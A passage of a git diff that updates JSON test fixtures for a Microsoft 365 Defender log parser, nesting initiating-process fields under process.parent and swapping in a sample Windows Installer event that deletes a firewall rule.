index 348f76f4e..75ab306b8 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
@@ -16,19 +16,21 @@
     "@timestamp": "2023-01-04T14:05:32.314862Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
-        "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
-        "InitiatingProcessFileSize": 63984520,
-        "InitiatingProcessIntegrityLevel": "Medium",
-        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
-        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel",
-        "InitiatingProcessVersionInfoInternalFileName": "Excel",
-        "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe",
-        "InitiatingProcessVersionInfoProductName": "Microsoft Office",
-        "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538",
         "LocalIPType": "Private",
-        "RemoteIPType": "Public"
+        "RemoteIPType": "Public",
+        "process": {
+          "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614",
+          "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx",
+          "FileSize": 63984520,
+          "IntegrityLevel": "Medium",
+          "TokenElevation": "TokenElevationTypeDefault",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Microsoft Excel",
+          "VersionInfoInternalFileName": "Excel",
+          "VersionInfoOriginalFileName": "Excel.exe",
+          "VersionInfoProductName": "Microsoft Office",
+          "VersionInfoProductVersion": "16.0.15601.20538"
+        }
       },
       "type": "ConnectionSuccess"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index cd2ca7981..7acf31f01 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
@@ -29,9 +29,11 @@
       }
     },
     "process": {
-      "user": {
-        "domain": "autorite nt",
-        "name": "syst\u00e8me"
+      "parent": {
+        "user": {
+          "domain": "autorite nt",
+          "name": "syst\u00e8me"
+        }
       }
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 7d72e6264..3847a138b 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -17,25 +17,30 @@
     "action": {
       "properties": {
         "AccountSid": "S-1-1-11",
-        "InitiatingProcessCommandLine": "\"MsMpEng.exe\"",
-        "InitiatingProcessFileSize": 133576,
-        "InitiatingProcessIntegrityLevel": "System",
-        "InitiatingProcessLogonId": "999",
-        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
-        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable",
-        "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe",
-        "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-        "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6",
         "LogonId": "999",
-        "ProcessIntegrityLevel": "System",
-        "ProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
-        "ProcessVersionInfoInternalFileName": "MpCmdRun",
-        "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe",
-        "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
-        "ProcessVersionInfoProductVersion": "4.18.2301.6"
+        "process": {
+          "IntegrityLevel": "System",
+          "TokenElevation": "TokenElevationTypeDefault",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility",
+          "VersionInfoInternalFileName": "MpCmdRun",
+          "VersionInfoOriginalFileName": "MpCmdRun.exe",
+          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+          "VersionInfoProductVersion": "4.18.2301.6",
+          "parent": {
+            "CommandLine": "\"MsMpEng.exe\"",
+            "FileSize": 133576,
+            "IntegrityLevel": "System",
+            "LogonId": "999",
+            "TokenElevation": "TokenElevationTypeDefault",
+            "VersionInfoCompanyName": "Microsoft Corporation",
+            "VersionInfoFileDescription": "Antimalware Service Executable",
+            "VersionInfoInternalFileName": "MsMpEng.exe",
+            "VersionInfoOriginalFileName": "MsMpEng.exe",
+            "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+            "VersionInfoProductVersion": "4.18.2301.6"
+          }
+        }
       },
       "type": "ProcessCreated"
     },
@@ -69,31 +74,33 @@
         "54",
         "Scan"
       ],
-      "code_signature": {
-        "status": "Valid",
-        "subject_name": "OsVendor"
-      },
       "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54",
-      "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
-      "hash": {
-        "md5": "5d5608654828cf052ba013b3c37cbb61",
-        "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
-        "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
-      },
-      "name": "MsMpEng.exe",
+      "name": "MpCmdRun.exe",
       "parent": {
-        "name": "services.exe",
-        "pid": 1032,
-        "start": "2023-01-03T08:51:26.740241Z"
+        "code_signature": {
+          "status": "Valid",
+          "subject_name": "OsVendor"
+        },
+        "command_line": "\"MsMpEng.exe\"",
+        "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
+        "hash": {
+          "md5": "5d5608654828cf052ba013b3c37cbb61",
+          "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
+          "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
+        },
+        "name": "MsMpEng.exe",
+        "pid": 5456,
+        "start": "2023-01-03T08:51:29.269279Z",
+        "user": {
+          "domain": "NT",
+          "id": "S-1-1-11",
+          "name": "System"
+        },
+        "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
       },
       "pid": 37788,
       "start": "2023-01-04T14:15:10.355033Z",
-      "user": {
-        "domain": "NT",
-        "id": "S-1-1-11",
-        "name": "System"
-      },
-      "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
+      "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0"
     },
     "related": {
       "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index d2e83b32a..cac1e9791 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -1,9 +1,15 @@
 {
   "input": {
-    "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}"
+    "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
   },
   "expected": {
-    "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
+    "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
     "event": {
       "category": [
         "process"
@@ -13,70 +19,119 @@
         "info"
       ]
     },
-    "@timestamp": "2024-10-22T15:09:44.594155Z",
+    "@timestamp": "2024-11-08T14:38:51.907372Z",
     "action": {
       "properties": {
-        "InitiatingProcessLogonId": "0",
-        "LogonId": "0"
+        "AccountSid": "S-1-2-3",
+        "LogonId": "999",
+        "process": {
+          "IntegrityLevel": "System",
+          "TokenElevation": "TokenElevationTypeDefault",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Network Command Shell",
+          "VersionInfoInternalFileName": "processcommand.exe",
+          "VersionInfoOriginalFileName": "processcommand.exe",
+          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+          "VersionInfoProductVersion": "10.0.22621.1",
+          "parent": {
+            "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000",
+            "FileSize": 145408,
+            "IntegrityLevel": "System",
+            "LogonId": "999",
+            "TokenElevation": "TokenElevationTypeDefault",
+            "VersionInfoCompanyName": "Microsoft Corporation",
+            "VersionInfoFileDescription": "Windows\u00ae installer",
+            "VersionInfoInternalFileName": "file",
+            "VersionInfoOriginalFileName": "file.exe",
+            "VersionInfoProductName": "Windows Installer - Unicode",
+            "VersionInfoProductVersion": "5.0.22621.3880"
+          }
+        }
       },
       "type": "ProcessCreated"
     },
     "file": {
-      "directory": "/usr/bin/ps",
+      "directory": "C:\\Windows\\processcommand.exe",
       "hash": {
-        "md5": "098f6bcd4621d373cade4e832627b4f6",
-        "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3",
-        "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
       },
-      "name": "ps",
-      "size": 144632
+      "name": "processcommand.exe",
+      "size": 82944
     },
     "host": {
-      "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca",
-      "name": "computer.intranet.example"
+      "id": "123456789abcdef",
+      "name": "host.group.local"
     },
     "microsoft": {
       "defender": {
         "report": {
-          "id": "67417"
+          "id": "17318"
         }
       }
     },
     "process": {
       "args": [
-        "--no-headers",
-        "-A",
-        "-o",
-        "comm,pid,pcpu,pmem,rss,etimes"
+        "HTTP",
+        "advfirewall",
+        "delete",
+        "embedded",
+        "firewall",
+        "incoming",
+        "name=\"program=description=",
+        "rule",
+        "server",
+        "traffic\""
       ],
-      "code_signature": {
-        "status": "Unknown",
-        "subject_name": "Unknown"
-      },
-      "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers",
+      "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"",
+      "name": "processcommand.exe",
       "parent": {
